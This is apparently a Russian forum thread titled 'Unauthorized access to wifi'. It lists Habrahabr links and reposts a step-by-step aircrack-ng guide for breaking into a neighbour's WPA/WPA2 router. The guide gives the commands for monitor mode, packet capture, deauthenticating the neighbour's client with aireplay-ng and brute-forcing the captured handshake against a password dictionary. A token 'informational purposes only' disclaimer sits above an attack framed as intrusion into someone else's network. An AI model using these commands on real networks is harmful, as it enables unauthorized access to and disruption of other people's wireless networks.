Несанкционированный доступ к wifi
За 3 секунды http://habrahabr.ru/post/151688/
За 10 часов http://habrahabr.ru/company/xakep/blog/143834/
Уязвимости
http://habrahabr.ru/post/202034/
http://habrahabr.ru/post/183314/
http://habrahabr.ru/post/168683/
http://habrahabr.ru/post/199294/
Несанкционированный доступ к wifi
Сообщений 1 страница 2 из 2
Поделиться12014-05-30 19:49:06
Поделиться22015-09-15 13:56:50
Тестирование WiFi сетей с помощью пакета aircrack-ng
source: http://antik.mybb.ru/viewtopic.php?id=8
Вся информация дана исключительно в ознакомительных целях
На практике был использованы утилиты из дистрибутива Kali Linux
Итак, картина маслом:
74:DE:2B:77:19:4D - я.
18:F4:6A:9B:BF:59 - сосед.
C8:64:C7:53:02:0C - нужная нам точка доступа (роутер).
Роутер работает на 5 канале. Шифрование WPA/WPA2. Отображаемое имя DIR-300Запускаем беспроводной интерфейс в режиме мониторинга
airmon-ng start wlan0
Слушаем (мониторим) эфир
Предварительная разведка
airodump-ng mon0
Останавливаем мониторинг клавишами Ctrl+CСлушаем пакеты только для конкретной точки доступа
airodump-ng --bssid C8:64:C7:53:02:0C mon0Начинаем запись (дампинг) пакетов в файлы packets*
airodump-ng -w packets -c 5 mon0Или лучше вести выборочную запись
airodump-ng --bssid C8:64:C7:53:02:0C -w packets -c 5 mon0
Здесь
--bssid C8:64:C7:53:02:0C точка доступа
-c 5 номер каналаДеаутентифицируем соседа
Не останавливая записи пакетов, открываем новую консоль и создаём помехи соседу.
aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c 18:F4:6A:9B:BF:59 --ignore-negative-one mon0Подбираем PSK ключ по словарю
Брутим полученные даные packets-01.cap с помощью словаря passwords.txt
aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets-01.capЕсли было проведено несколько попыток записи, то можно анализировать группу файлов
aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets*.capЗдесь passwords.txt - текстовый файл, в каждой строке которого записан один пароль. Можно создать собственный словарь или скачать из Интернета.